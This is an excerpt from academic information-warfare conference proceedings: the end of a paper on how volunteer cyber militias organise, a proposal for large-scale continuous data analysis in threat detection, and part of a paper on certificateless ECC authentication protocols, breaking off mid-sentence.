generic term hacker is used to encompass all manner of people who perform cyber attacks on their<br />

own, regardless of their background, motivation and skill level. It includes the hackers, crackers and<br />

script kiddies described by Young and Aitel (2004). The hacker cell includes several hackers who<br />

commit cyber attacks on a regular basis over extended periods of time. Examples of hacker cells are<br />

Team Evil and Team Hell, as described in Carr (2009).<br />

3.1 Attributes<br />

Unlike the Forum, the Cell members are likely to know each other in real life, while remaining<br />

anonymous to the outside observer. Since their activities are almost certainly illegal, they need to trust<br />

each other. This limits the size of the group and requires a (lengthy) vetting procedure for any new<br />

recruits. The vetting procedure can include proof of illegal cyber attacks.<br />

The command and control structure of the Cell can vary from a clear self-determined hierarchy to a<br />

flat organization, where members coordinate their actions, but do not give or receive orders. In theory,<br />

several Cells can coordinate their actions in a joint campaign, forming a confederation of hacker cells.<br />

The Cells can exist for a long period of time, in response to a long-term problem, such as the Israel-<br />

Palestine conflict. The activity of such a Cell ebbs and flows in accordance with the intensity of the<br />

underlying conflict. The Cell may even disband for a period of time, only to reform once the situation<br />

intensifies again.<br />

Since hacking is a hobby (potentially a profession) for the members, they are experienced with the<br />

use of cyber attacks. One of the more visible types of attacks that can be expected from a Cell is the<br />

website defacement. Defacement refers to the illegal modification of website content, which often<br />

includes a message from the attacker, as well as the attacker’s affiliation. The Zone-H web archive<br />

309


Rain Ottis<br />

lists thousands of examples of such activity, as reported by the attackers. Many of the attacks are<br />

clearly politically motivated and identify the Cell that is responsible.<br />

Some members of the Cell may be involved with cyber crime. For example, the development,<br />

dissemination, maintenance and use of botnets for criminal purposes. These resources can be used<br />

for politically motivated cyber attacks on behalf of the Cell.<br />

3.2 Strengths<br />

A benefit of the Cell model is that it can mobilize very quickly, as the actors presumably already have<br />

each other’s contact information. In principle, the Cell can mobilize within minutes, although it likely<br />

takes hours or days to complete the process.<br />

A Cell is quite resistant to infiltration, because the members can be expected to establish their hacker<br />

credentials before being allowed to join. This process may include proof of illegal attacks.<br />

Since the membership can be expected to be experienced in cyber attack techniques, the Cell can be<br />

quite effective against unhardened targets. However, hardened targets may or may not be within the<br />

reach of the Cell, depending on their specialty and experience. Prior hacking experience also allows<br />

them to cover their tracks better, should they wish to do so.<br />

3.3 Weaknesses<br />

While a Cell model is more resistant to countermeasures than the Forum model, it does offer potential<br />

weaknesses to exploit. The first opportunity for exploitation is the hacker’s ego. Many of the more<br />

visible attacks, including defacements, leave behind the alias or affiliation of the attacker, in order to<br />

claim the bragging rights. (Carr 2009) This seems to indicate that they are quite confident in their skills<br />

and proud of their achievements. As such, they are potentially vulnerable to personal attacks, such as<br />

taunting or ridiculing in public. Stripping the anonymity of the Cell may also work, as at least some<br />

members could lose their job and face law enforcement action in their jurisdiction. (Carr 2009) As<br />

described by Ottis (2010b), it is probably not necessary to actually identify all the members of the Cell.<br />

Even if the identity of a few of them is revealed or if the corresponding perception can be created<br />

among the membership, the trust relationship will be broken and the effectiveness of the group will<br />

decrease.<br />

Prior hacking experience also provides a potential weakness. It is more likely that the law<br />

enforcement know the identity of a hacker, especially if he or she continues to use the same affiliation<br />

or hacker alias. While there may not be enough evidence or damage or legal base for law<br />

enforcement action in response to their criminal attacks, the politically motivated attacks may provide<br />

a different set of rules for the local law enforcement.<br />

The last problem with the Cell model is scalability. There are only so many skilled hackers who are<br />

willing to participate in a politically motivated cyber attack. While this number may still overwhelm a<br />

small target, it is unlikely to have a strong effect on a large state.<br />

4. The hierarchy<br />

The third option for organizing a volunteer force is to adopt a traditional hierarchical structure. This<br />

approach is more suitable for government sponsored groups or other cohesive groups that can agree<br />

to a clear chain of command. For example, the People’s Liberation Army of China is known to include<br />

militia type units in their IW battalions. (Krekel 2009) The model can be divided into two generic submodels:<br />

anonymous and identified membership.<br />

4.1 Attributes<br />

The Hierarchy model is similar in concept to military units, where a unit commander exercises power<br />

over a limited number of sub-units. The number of command levels depends on the overall size of the<br />

organization.<br />

Each sub-unit can specialize on some specific task or role. For example, the list of sub-unit roles can<br />

include reconnaissance, infiltration/breaching, exploitation, malware/exploit development and training.<br />

Depending on the need, there can be multiple sub-units with the same role. Consider the analogy of<br />

310


Rain Ottis<br />

an infantry battalion, which may include a number of infantry companies, anti-tank and mortar<br />

platoons, a reconnaissance platoon, as well as various support units (communications, logistics), etc.<br />

This specialization and role assignment allows the militia unit to conduct a complete offensive cyber<br />

operation from start to finish.<br />

A Hierarchy model is the most likely option for a state sponsored entity, since it offers a more<br />

formalized and understandable structure, as well as relatively strong command and control ability. The<br />

control ability is important, as the actions of a state sponsored militia are by definition attributable to<br />

the state.<br />

However, a Hierarchy model is not an automatic indication of state sponsorship. Any group that is<br />

cohesive enough to determine a command structure amongst them can adopt a hierarchical structure.<br />

This is very evident in Massively Multiplayer Online Games (MMOG), such as World of Warcraft or<br />

EVE Online, where players often form hierarchical groups (guilds, corporations, etc.) in order to<br />

achieve a common goal. The same approach is possible for a cyber militia as well. In fact, Williams<br />

(2007) suggests that gaming communities can be a good recruiting ground for a cyber militia.<br />

While the state sponsored militia can be expected to have identified membership (still, it may be<br />

anonymous to the outside observer) due to control reasons, a non-state militia can consist of<br />

anonymous members that are only identified by their screen names.<br />

4.2 Strengths<br />

The obvious strength of a hierarchical militia is the potential for efficient command and control. The<br />

command team can divide the operational responsibilities to specialized sub-units and make sure that<br />

their actions are coordinated. However, this strength may be wasted by incompetent leadership or<br />

other factors, such as overly restrictive operating procedures.<br />

A hierarchical militia may exist for a long time even without ongoing conflict. During “peacetime“, the<br />

militia’s capabilities can be improved with recruitment and training. This degree of formalized<br />

preparation with no immediate action in sight is something that can set the hierarchy apart from the<br />

Forum and the Cell.<br />

If the militia is state sponsored, then it can enjoy state funding, infrastructure, as well as cooperation<br />

from other state entities, such as law enforcement or intelligence community. This would allow the<br />

militia to concentrate on training and operations.<br />

4.3 Weaknesses<br />

A potential issue with the Hierarchy model is scalability. Since this approach requires some sort of<br />

vetting or background checks before admitting a new member, it may be time consuming and<br />

therefore slow down the growth of the organization.<br />

Another potential issue with the Hierarchy model is that by design there are key persons in the<br />

hierarchy. Those persons can be targeted by various means to ensure that they will not be effective or<br />

available during a designated period, thus diminishing the overall effectiveness of the militia. A<br />

hierarchical militia may also have issues with leadership if several people contend for prestigious<br />

positions. This potential rift in the cohesion of the unit can potentially be exploited by infiltrator agents.<br />

Any activities attributed to the state sponsored militia can further be attributed to the state. This puts<br />

heavy restrictions on the use of cyber militia “during peacetime“, as the legal framework surrounding<br />

state use of cyber attacks is currently unclear. However, in a conflict scenario, the state attribution is<br />

likely not a problem, because the state is party to the conflict anyway. This means that a state<br />

sponsored offensive cyber militia is primarily useful as a defensive capability between conflicts. Only<br />

during conflict can it be used in its offensive role.<br />

While a state sponsored cyber militia may be more difficult (but not impossible) to infiltrate, they are<br />

vulnerable to public information campaigns, which may lead to low public and political support,<br />

decreased funding and even official disbanding of the militia. On the other hand, if the militia is not<br />

state sponsored, then it is prone to infiltration and internal information operations similar to the one<br />

considered at the Forum model.<br />

311


Rain Ottis<br />

Of the three models, the hierarchy probably takes the longest to establish, as the chain of command<br />

and role assignments get settled. During this process, which could take days, months or even years,<br />

the militia is relatively inefficient and likely not able to perform any complex operations.<br />

5. Comparison<br />

When analyzing the three models, it quickly becomes apparent that there are some aspects that are<br />

similar to all of them. First, they are not constrained by location. While the Forum and the Cell are by<br />

default dispersed, even a state sponsored hierarchical militia can operate from different locations.<br />

Second, since they are organizations consisting of humans, then one of the more potent ways to<br />

neutralize cyber militias is through information operations, such as persuading them that their<br />

identities have become known to the law enforcement, etc.<br />

Third, all three models benefit from a certain level of anonymity. However, this also makes them<br />

susceptible for infiltration, as it is difficult to verify the credentials and intent of a new member.<br />

On the other hand, there are differences as well. Only one model lends itself well to state sponsored<br />

entities (hierarchy), although, in principle, it is possible to use all three approaches to bolster the<br />

state’s cyber power.<br />

The requirement for formalized chain of command and division of responsibilities means that the initial<br />

mobilization of the Hierarchy can be expected to take much longer than the more ad-hoc Forum or<br />

Cell. In case of short conflicts, this puts the Hierarchy model at a disadvantage.<br />

Then again, the Hierarchy model is more likely to adopt a “peace time” mission of training and<br />

recruitment in addition to the “conflict” mission, while the other two options are more likely to be<br />

mobilized only in time of conflict. This can offset the slow initial formation limitation of the Hierarchy, if<br />

the Hierarchy is established well before the conflict.<br />

While the Forum can rely on their numbers and use relatively primitive attacks, the Cell is capable of<br />

more sophisticated attacks due to their experience. The cyber attack capabilities of the Hierarchy,<br />

however, can range from trivial to complex.<br />

It is important to note that the three options covered here can be combined in many ways, depending<br />

on the underlying circumstances and the personalities involved.<br />

Conclusion<br />

Politically motivated cyber attacks are becoming more frequent every year. In most cases the cyber<br />

conflicts include offensive non-state actors (spontaneously) formed from volunteers. Therefore, it is<br />

important to study these groups.<br />

I have provided a theoretical way to categorize non-trivial cyber militias based on their organization.<br />

The three theoretical models are: the Forum, the Cell and the Hierarchy. In reality, it is unlikely to see<br />

a pure form of any of these, as different groups can include aspects of several models. However, the<br />

strengths and weaknesses identified should serve as useful guides to dealing with the cyber militia<br />

threat.<br />

Disclaimer: The opinions expressed here should not be interpreted as the official policy of the<br />

Cooperative Cyber Defence Centre of Excellence or the North Atlantic Treaty Organization.<br />

References<br />

Carr, J. (2009) Inside Cyber Warfare. Sebastopol: O'Reilly Media.<br />

Denning, D. E. (2010) “Cyber Conflict as an Emergent Social Phenomenon.” In Holt, T. & Schell, B. (Eds.)<br />

Corporate Hacking and Technology-Driven Crime: Social Dynamics and Implications. IGI Global, pp 170-<br />

186.<br />

Krekel, B., DeWeese, S., Bakos, G., Barnett, C. (2009) Capability of the People’s Republic of China to Conduct<br />

Cyber Warfare and Computer Network Exploitation. Report for the US-China Economic and Security<br />

Review Commission.<br />

Nazario, J. (2009) “Politically Motivated Denial of Service Attacks.” In Czosseck, C. & Geers, K. (Eds.) The Virtual<br />

Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, pp 163-181.<br />

312


Rain Ottis<br />

Ottis, R. (2008) “Analysis of the 2007 Cyber Attacks Against Estonia from the Information Warfare Perspective.”<br />

In Proceedings of the 7th <strong>European</strong> <strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong><br />

Publishing Limited, pp 163-168.<br />

Ottis, R. (2009) ”Theoretical Model for Creating a Nation-State Level Offensive Cyber Capability.” In Proceedings<br />

of the 8th <strong>European</strong> <strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong> Publishing<br />

Limited, pp 177-182.<br />

Ottis, R. (2010a) “From Pitch Forks to Laptops: Volunteers in Cyber Conflicts.” In Czosseck, C. and Podins, K.<br />

(Eds.) <strong>Conference</strong> on Cyber Conflict. Proceedings 2010. Tallinn: CCD COE Publications, pp 97-109.<br />

Ottis, R. (2010b) “Proactive Defence Tactics Against On-Line Cyber Militia.” In Proceedings of the 9th <strong>European</strong><br />

<strong>Conference</strong> on Information Warfare and Security. Reading: <strong>Academic</strong> Publishing Limited, pp 233-237.<br />

Williams, G., Arreymbi, J. (2007) Is Cyber Tribalism Winning Online Information Warfare? In Proceedings of<br />

ISSE/SECURE 2007 Securing Electronic Business Processes. Wiesbaden: Vieweg. On-line:<br />

http://www.springerlink.com/content/t2824n02g54552m5/n<br />

Young, S., Aitel, D. (2004) The Hacker’s Handbook. The Strategy behind Breaking into and Defending Networks.<br />

Boca Raton: Auerbach.<br />

313


314


Work<br />

in<br />

Progress<br />

Papers<br />

315


316


Large-Scale Analysis of Continuous Data in Cyber-Warfare<br />

Threat Detection<br />

William Acosta<br />

University of Toledo, USA<br />

william.acosta@utoledo.edu<br />

Abstract: Combating cyber/information warfare threats requires analyzing vast quantities of diverse data. The<br />

data required to detect attacks as they occur (on-line analysis of live data) and predict future threats (forensic<br />

analysis/data mining) is not only large, but is growing at a staggering rate. Data such as network traffic logs,<br />

emails, and social networking posts, SMS message, and cell phone call logs are, by nature, continuous and<br />

growing. The problem addressed in this research is that current systems are not designed to handle either the<br />

scope or nature of the analysis or the data itself. For example, distributed data processing systems like Google’s<br />

Map-Reduce provide the ability to process large data sets, but they are not designed to easily support processing<br />

of changing data sets or data-mining algorithms. In light of this, Google has itself recently stopped using<br />

MapReduce for building its web-index, opting instead for a custom mechanism that can more quickly respond to<br />

and process new content. Non-traditional databases, like vertically-partitioned/column-store databases, can<br />

efficiently support analysis algorithms on large quantities of data, but they are not designed to support<br />

continuously changing data sets. The goal of this research is to explore and design new data management<br />

system that can handle large quantities of incrementally growing data as well as direct support for data mining<br />

and analysis algorithms. Specifically, this research proposes a new distributed data processing system that<br />

exploits the parallel and distributed resources/computation of cloud computing infrastructures. It makes use of<br />

summary data structures that can be updated incrementally and continuous queries to support analysis and data<br />

mining algorithms natively. This approach allows for larger-scale and more robust analysis on continuously<br />

growing data that can help detect, predict and respond to cyber-warfare threats.<br />

Keywords: data-mining, databases, text-search, cloud computing, data integration<br />

1. Introduction<br />

Protection against cyber/information warfare threats requires understanding the nature, methods, and<br />

patterns of those attacks. Such understanding can allow for early detection and, possibly prediction,<br />

of attacks. Gaining an understanding of the patterns and mechanisms used in cyber/information<br />

warfare attacks requires analyzing large amounts of diverse data such as server logs (Myers et al.<br />

2010), emails, SMS messages, and social-networking data. Not only is the data diverse, but it is also<br />

continuous; new data gets generated every day. Furthermore, analysis of this data can require<br />

equally diverse approaches: graph-theoretic algorithms (detecting patterns in social-networking), data<br />

mining algorithms (associations between events), statistical models, clustering algorithms, etc. The<br />

diverse nature of the data and analysis algorithms as well as the large quantity of data to be analyzed<br />

poses problems to both traditional databases and storage systems. In order to provide the analysis of<br />

diverse and continuous data required for cyber-warfare threat detection, a new system is needed for<br />

managing large quantities of diverse data that can support equally diverse analysis algorithms.<br />

The need to incrementally process large quantities of data is applicable to wide range of applications.<br />

For example, Google replaced MapReduce (Dean & Ghemawat 2004), its current web-indexing<br />

system, in order to enable faster updates of its index (Metz 2010, Peng & Dabek 2010). Similarly,<br />

detecting and responding to information security threats requires a mechanism that cannot only<br />

manage large quantities of data, but also provide for fast response time of complex, continuous<br />

analysis. This paper proposes a new distributed data-analysis framework that is designed to meet the<br />

needs of applications that require analysis of continuous data. Next, Section 2 presents the design of<br />

the proposed system in the context of related work. Section 3 then provides concluding remarks.<br />

2. Design and requirements of a continuous data analysis system<br />

Cyber-warfare threat detection requires analyzing large quantities of diverse data that is continuously<br />

generated. The properties of the raw data in this type of application impose some constraints on the<br />

analysis and data storage systems. These applications require analyzing not only current data, but<br />

also prior/historical from many heterogeneous sources. Because the raw data is continuously<br />

generated, old data must be kept for analysis while new data is integrated into the storage and<br />

analysis framework. Because old data must be kept and not changed, the system need not support<br />

updates of raw data. Effectively, raw data is append-only. This can be leveraged to improve storage<br />

efficiency and performance; it is easier to implement and support distributed storage as no write-<br />

317


William Acosta<br />

locking of existing data is necessary. It also allows for the analysis framework to make use novel<br />

summary data structures and algorithms that can incorporate the changes made to the data without<br />

requiring analysis of the full dataset.<br />

2.1 Storage and data management<br />

The large quantity of data makes a centralized storage solution unfeasible; instead, a distributed<br />

storage solution Is favored. The parallel nature of many of the algorithms makes a distributed solution<br />

not only more feasible, but also desirable. Distributed storage systems such as Google’s BigTable<br />

(Chang et al. 2006), Yahoo’s PNUTS (Cooper et al. 2008), and Amazon’s Dynamo (DeCandia et al.<br />

2007) provide the low-level mechanisms for storing, and managing large quantities of data. These<br />

systems were designed to support coordinated reads and updates of data in a distributed<br />

environment. To support the needs of applications like cyber-warfare threat detection, a distributed<br />

storage system should provide efficient, low-level support for append-only writes of raw data, as well<br />

as efficient tracking of incremental additions and updates of the dataset.<br />

2.2 Distributed processing of data<br />

Recently, there has been a great deal of research in Google’s MapReduce (Dean & Ghemawat 2004)<br />

distributed computing software framework for processing large datasets. However, its batch-oriented<br />

nature was not designed to deal with incremental or continuous data updates. This makes it<br />

unsuitable for a variety of applications including cyber-warfare threat analysis and detection. Systems<br />

like Haloop (Bu et al. 2010) and MapReduce Online (Condie et al. 2010) have sought to add<br />

continuous query support to MapReduce. To achieve this, these systems had to make fundamental<br />

changes to the API and underlying architecture of MapReduce. This paper argues that what is<br />

needed instead is a system designed from the ground-up to support the demands of analysis and<br />

mining algorithms on large sets of continuously generated data.<br />

2.3 Data management and analysis<br />

The problem of analyzing continuous data has been explored by stream databases (Abadi et al. 2005,<br />

Shah et al. 2004). Similarly, continuous queries in databases have been proposed with systems such<br />

as TelegraphCQ (Chandrasekaran et al. 2003) and CQL (Arasu et al. 2006). These systems can<br />

handle processing queries on streams of data with long-running/continuous queries. However, they<br />

lack the ability to support analytic algorithms over a large and diverse dataset. In contrast, verticallypartitioned<br />

databases such as C-Store (Stonebraker et al. 2005) excel at fast and efficient support of<br />

complex analytics. Unfortunately, vertically-partitioned databases suffer from poor performance on<br />

writes. In essence, insertions and updates require that the index be rebuilt. Although performance of<br />

reads is very fast once the index is built, building the index is very expensive. What is needed is a<br />

system that can perform complex analytics on continuous data without requiring a complex index to<br />

be completely rebuilt as a result of data updates. This paper proposes a new, incremental indexing<br />

system that keeps track of summarized historical data while allowing for many small [incremental]<br />

updates to be incorporated. The key difference is that, unlike traditional database indexes, the new<br />

incremental index would not be build off-line (batch-process). Instead, the index would incorporate the<br />

many incremental updates on-line so that the index of past data is always active and valid.<br />

In addition to the storage and distributed computing framework, it is also important to consider the<br />

needs of the algorithms that will be used in the system. Applications with such diverse data require<br />

equally diverse analysis. For example, detecting hidden correlations and associations between events<br />

seen in server logs requires mining association rules (Agrawal & Srikant 1994) whereas detecting<br />

interaction of attackers in a network may involve graph theoretic algorithms.<br />

3. Conclusion<br />

This paper presents a case for a new distributed computing system that is explicitly designed to meet<br />

the unique needs of applications such as cyber-warfare threat detection. The system should support<br />

large quantities of diverse data such as server logs, emails, social-network data, etc. It should allow<br />

for a variety of mining and analysis algorithms and support for those algorithms to be processed in a<br />

parallel and distributed manner. The system must not only meet these needs, but also do so in a way<br />

that can efficiently support continuous analysis of data that is continuously generated.<br />

318


References<br />

William Acosta<br />

Abadi, D. J., Ahmad, Y., Balazinska, M., Cherniack, M., hyon Hwang, J., Lindner, W., Maskey, A. S., Rasin, E.,<br />

Ryvkina, E., Tatbul, N., Xing, Y. & Zdonik, S. (2005), The design of the borealis stream processing engine,<br />

in ‘CIDR ’05: Proceedings of the second biennial <strong>Conference</strong> on Innovative Data Systems Research’, pp.<br />

277–289.<br />

Agrawal, R. & Srikant, R. (1994), Fast algorithms for mining association rules, in J. B. Bocca, M. Jarke & C.<br />

Zaniolo, eds, ‘Proc. 20th Int. Conf. Very Large Data Bases, VLDB’, Morgan Kaufmann, pp. 487–499.<br />

Arasu, A., Babu, S. & Widom, J. (2006), ‘The cql continuous query language: semantic foundations and query<br />

execution’, The VLDB Journal 15(2), 121–142.<br />

Bu, Y., Howe, B., Balazinska, M. & Ernst, M. D. (2010), Haloop: Efficient iterative data processing on large<br />

clusters, in ‘Proceedings of the VLDB Endowment’, Vol. 3.<br />

Chandrasekaran, S., Cooper, O., Deshpande, A., Franklin, M. J., Hellerstein, J. M., Hong, W., Krishnamurthy, S.,<br />

Madden, S., Raman, V., Reiss, F. & Shah, M. (2003), Telegraphcq: Continuous dataflow processing for an<br />

uncertain world, in ‘CIDR ’03: Proceedings of the first biennial <strong>Conference</strong> on Innovative Data Systems<br />

Research’.<br />

Chang, F., Dean, J., Ghemawat, S., Hsieh, W. C., Wallach, D. A., Burrows, M., Chandra, T., Fikes, A. & Gruber,<br />

R. E. (2006), Bigtable: A distributed storage system for structured data, in ‘Proceedings of the 7th<br />

symposium on Operating systems design and implementation (OSDI ’06)’, Seattle, WA.<br />

Condie, T., Conway, N., Alvaro, P., Elmeleegy, J. M. H. K. & Sears, R. (2010), Mapreduce online, in<br />

‘Proceedings of the Seventh USENIX Symposium on Networked System Design and Implementation (NSDI<br />

2010)’, San Jose, CA.<br />

Cooper, B. F., Ramakrishnan, R., Srivastava, U., Silberstein, A., Bohannon, P., arno Jacobsen, H., Puz, N.,<br />

Weaver, D. & Yerneni, R. (2008), Pnuts: Yahoo!s hosted data serving platform, in ‘Proceedings of the 34th<br />

International <strong>Conference</strong> on Very Large Data Bases (VLDB ’08)’, Auckland, New Zealand.<br />

Dean, J. & Ghemawat, S. (2004), Mapreduce: simplified data processing on large clusters, in ‘OSDI’04:<br />

Proceedings of the <strong>6th</strong> conference on Symposium on Operating Systems Design & Implementation’,<br />

USENIX Association, Berkeley, CA, USA, pp. 10–10.<br />

DeCandia, G., Hastorun, D., Jampani, M., Kakulapati, G., Lakshman, A., Pilchin, A., Sivasubramanian, S.,<br />

Vosshall, P. & Vogels, W. (2007), Dynamo: amazon’s highly available key-value store, in ‘SOSP ’07:<br />

Proceedings of twenty-first ACM SIGOPS symposium on Operating systems principles’, ACM, New York,<br />

NY, USA, pp. 205–220.<br />

Metz, C. (2010), ‘Google search index splits with mapreduce’. URL: http: // www. theregister. co. uk/ 2010/ 09/<br />

09/ google_ caffeine_ explained/<br />

Myers, J., Grimaila, M. & Mills, R. (2010), Insider threat detection using distributed event correlation of web<br />

server logs, in ‘ICIW ’10: Proceedings of the 5th International <strong>Conference</strong> on Information-Warfare and<br />

Security’.<br />

Peng, D. & Dabek, F. (2010), Large-scale incremental processing using distributed transactions and notifications,<br />

in ‘OSDI ’10: Proceedings of the Ninth USENIX Symposium on Operating Systems Design and<br />

Implementation’.<br />

Shah, M. A., Hellerstein, J. M. & Brewer, E. (2004), Highly available, fault-tolerant, parallel dataflows, in<br />

‘SIGMOD ’04: Proceedings of the 2004 ACM SIGMOD international conference on Management of data’,<br />

ACM, New York, NY, USA, pp. 827–838.<br />

Stonebraker, M., Abadi, D. J., Batkin, A., Chen, X., Cherniack, M., Ferreira, M., Lau, E., Lin, A., Madden, S.,<br />

O’Neil, E., O’Neil, P., Rasin, A., Tran, N. & Zdonik, S. (2005), C-store: a column-oriented dbms, in ‘VLDB<br />

’05: Proceedings of the 31st international conference on Very large data bases’, VLDB Endowment, pp.<br />

553–564.<br />

319


A System and Method for Designing Secure Client-Server<br />

Communication Protocols Based on Certificateless PKI<br />

Natarajan Vijayarangan<br />

Tata Consultancy Services Limited (TCS), Chennai, India<br />

n.vijayarangan@tcs.com<br />

Abstract: Client-server networking is a distributed application architecture that partitions tasks or work loads<br />

between service providers (servers) and service requesters (clients), where the network communication is not<br />

necessarily secure. A number of researchers and organizations have produced innovative methods to ensure a<br />

secure communication in the client-server set up. However, in this paper, TCS has brought out a system of novel<br />

network security protocols for a generic purpose. Let us take a look into the brief history of client-server<br />

communication. In 1993 Bollovin and Merritte patented a strong Password-based Authentication Key Exchange<br />

(PAKE), an interactive method for two or more parties to establish cryptographic keys based on one or more<br />

party's knowledge of a password. Later, Standford University patented Secure Remote Protocol (SRP) used for a<br />

new password authentication and key-exchange mechanism over an untrusted network. Then Sun Microsystems<br />

implemented the Elliptic Curve Cryptography (ECC) technology which is well integrated into the OpenSSL-<br />

Certificate Authority. This code enables secure TLS/SSL handshakes using the Elliptic curve based cipher suites.<br />

In this paper, we proposed a set of client-server communication protocols using certificateless Public Key<br />

Infrastructure (PKI) based on ECC. Then the protocols have identity based authentication without using bilinear<br />

maps, session key exchange and secure message transfer. Moreover, we showed that the protocols are<br />

lightweight and are designed to serve multiple applications.<br />

Keywords: certificateless public key cryptography, elliptic curve cryptography, jacobi identity, message<br />

preprocessing, lie algebras, challenge-response<br />

1. Introduction<br />

In the existing network operating systems, communication between the client and server takes place<br />

using File Transfer Protocol mode which is not a secure medium. The more secure medium for<br />

communication, Hypertext Transfer Protocol Secure, also does not ensure the security of messages,<br />

but the connection. For instance, some of the problems that users access with a set-top box unit<br />

would be data loss, content modification and so on. TCS has designed a set of novel network security<br />

protocols to avoid these issues and ensure robust communication between the client and server.<br />

Theoretically and practically, the proposed protocols have been analyzed that these protocols are<br />

secure against replay and rushing attacks. In this design, the certificateless PKI concept based on<br />

ECC (Al-Riyami and Paterson 2003, Hankerson et al 2004) is introduced to strengthen the protocols.<br />

Hence TCS filed up a patent application for this invention.<br />

2. Objectives of the invention<br />

The objectives of the invention are to provide: 1) a secure communication between client and server<br />

2) a robust, tamper-proof and lightweight authentication mechanism, 3) non-repudiation for clients and<br />

4) no password-based negotiation between client and server.<br />

3. Overview of the invention<br />

In the existing network security protocols, certificate-based public key cryptography and Identitybased<br />

cryptography have been widely used. These Crypto methods face the costly and complex key<br />

management problem and the key escrow problem in the real-life deployment. A few years ago,<br />

Certificateless Public Key Cryptography (CL-PKC) was introduced to address these problems, which<br />

have not been solved fully. Sometimes, CL-PKC uses bilinear pairings (Adi Shamir 1984) and inverse<br />

operations which will slowdown the performance of authentication process.<br />

TCS' new approach towards the network security protocols will solve the common problems between<br />

customers and network service providers or agents. Many researchers and organizations have<br />

developed innovative client-server communication protocols based on certificates which require a lot<br />

of computation, power consumption and memory space. TCS has designed a lightweight protocol that<br />

will overcome these issues.<br />

TCS has introduced CL-PKC with no bilinear pairings in the proposed set of network security<br />

protocols. These protocols are efficient and effective against common attacks and have applications<br />

in client-server set up over Transmission Control Protocol and User Datagram Protocol networks, Set-<br />

320


Natarajan Vijayarangan<br />

top box units and Telecommunication. Hence the three different Network Security Protocols (NSP 1, 2<br />

and 3) that TCS has developed are explained in the following sections.<br />

4. Description of NSP 1<br />

TCS has designed a network security protocol in a generic manner to ensure secure communication<br />

between client and server. This protocol initially allows the server to act as a Key Generation Center<br />

(KGC) for distributing public and private keys to clients. Later, every client has to generate a pair of<br />

public and private keys for authentication and session key generation. No certificate is exchanged in<br />

this protocol. Robust and well-proven algorithms, ECDSA (Elliptic Curve Digital Signature Algorithm)<br />

and ECDH (Elliptic Curve Diffie-Hellman) Key Exchange (Certicom Research 2000), are used in this<br />

protocol for authentication and session key generation respectively.<br />

Following is the workflow of NSP1:<br />

(Pre-Shared Key Mechanism) Every client has a pair of Public and Private keys generated by the<br />

server which acts as a Key Generation Center (KGC).<br />

Client initiates the communication to server by sending a message ‘Client Hello!’.<br />

Server generates Random Challenge (RC) of n-bits using Pseudo Random Number Generator<br />

(PRNG). Further, Server encrypts RC with client's public key using Elliptic Curve Encryption<br />

(ECE) method.<br />

Client decrypts the encrypted RC with its private key using ECE.<br />

Client generates Public and Private keys on NIST Elliptic curve-256 / 384 /512. Client signs the<br />

challenge and sends the signature to Server.<br />

Server verifies the signature and generates a key pair on the SAME curve. Server sends its public<br />

key to Client.<br />

Client and server negotiate an m-bit shared secret key using ECDH algorithm.<br />

Client and server have Session key of m bits for Encryption. Client and server have a cipher suite.<br />

A secure communication is established between Client and Server.<br />

5. Description of NSP 2<br />

There is no initial set up on generating a pair of public and private keys for client and server for<br />

network security protocol 2. But the client and the server have a unique Message Preprocessing (MP)<br />

function (Vijayarangan 2009), a bijective mapping, which helps to ensure no modification taken place,<br />

when a random challenge has been sent in plain. As a part of communication setup, each client<br />

receives a unique MP function and ID (an Identity number of a client) supplied by the server. It is<br />

important to know that an MP algorithm (consisting of 3 operations in a sequential manner- Shuffling,<br />

T-function and LFSR) converts a message into a randomized message. It has been analyzed that<br />

NSP 2 stands better than NSP 1 due to an MP function if an attacker predicts RC values during the<br />

communication.<br />

Following is the workflow of NSP 2:<br />

Client initiates the communication to server by sending a message ‘Client Hello!’.<br />

Server generates Random Challenge (RC) of n-bits using Pseudo Random Number Generator<br />

(PRNG) and computes the message preprocessing of RC. Client receives the RC and MP(RC). It<br />

verifies MP(RC).<br />

Client generates Public and Private keys on NIST Elliptic curve-256 / 384 / 512. Client signs the<br />

message = {RC || ID} and sends the signature with its public key and MP(public key) to Server.<br />

Server verifies the signature and generates a key pair on the SAME curve. Server sends its public<br />

key to Client.<br />

321


Natarajan Vijayarangan<br />

Client and Server negotiate an m-bit shared secret key using ECDH algorithm.<br />

Client and Server have Session key of m bits for Encryption. Client and Server have a cipher<br />

suite.<br />

A secure communication is established between Client and Server.<br />

6. Description of NSP 3<br />

It is similar to Network security protocol 1 and the difference can be seen in Signature generation.<br />

Client uses Jacobi identity, a special product on Lie algebras [8], to authenticate server. The Jacobi<br />

identity (Jacobson 1979) performs on a random challenge RC = x || y ||z (divide into 3 parts -<br />

trifurcation) and satisfies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. It is important to know that<br />

Lie product (Lie bracket) has a special property: [x, y] = -[y, x].<br />

Following is the workflow of NSP 3:<br />

(Pre-Shared Key Mechanism) Every client has a pair of Public and Private keys generated by the<br />

server which acts as a Key Generation Center (KGC).<br />

Client initiates the communication to server by sending a message ‘Client Hello!’.<br />

Server generates Random challenge (RC) of n-bits using Pseudo Random Number Generator<br />

(PRNG). Further, Server encrypts RC with client's public key using Elliptic Curve Encryption<br />

(ECE) method.<br />

Client decrypts the encrypted RC with its private key using ECE.<br />

Client computes Jaboci identity on RC = x||y||z and sends the Lie product [[x,y],z] to server.<br />

Server verifies the relationship [[x,y],z] + [[y,z],x] + [[z,x],y] = 0. Server sends its public key using<br />

ECC to Client.<br />

Client and server negotiate an m-bit shared secret key using ECDH algorithm.<br />

Client and server have Session key of m bits for Encryption. Client and server have a cipher suite.<br />

A secure communication is established between Client and Server.<br />

7. Analysis<br />

The proposed network security protocols do not allow replay and rushing attacks. An attacker cannot<br />

guess a random challenge (RC) in NSP 1, since it traverses in an encrypted form. It is safe to use<br />

NSP 1 in different nodes/channels.<br />

Considering NSP 2 that is different from NSP 1 and sends RC in plain with MP(RC). It is interesting to<br />

see the notion of bijective property in MP where an attacker can change RC, but not MP(RC). Given<br />

two distinct random challenges RC1 and RC2, MP(RC1) is not the same as MP(RC2). If the attacker<br />

tries to insert another random challenge, then server could detect this fraud by verifying a client's<br />

signature. Since MP function has Shuffling, T-function and LFSR operations that are invertible<br />

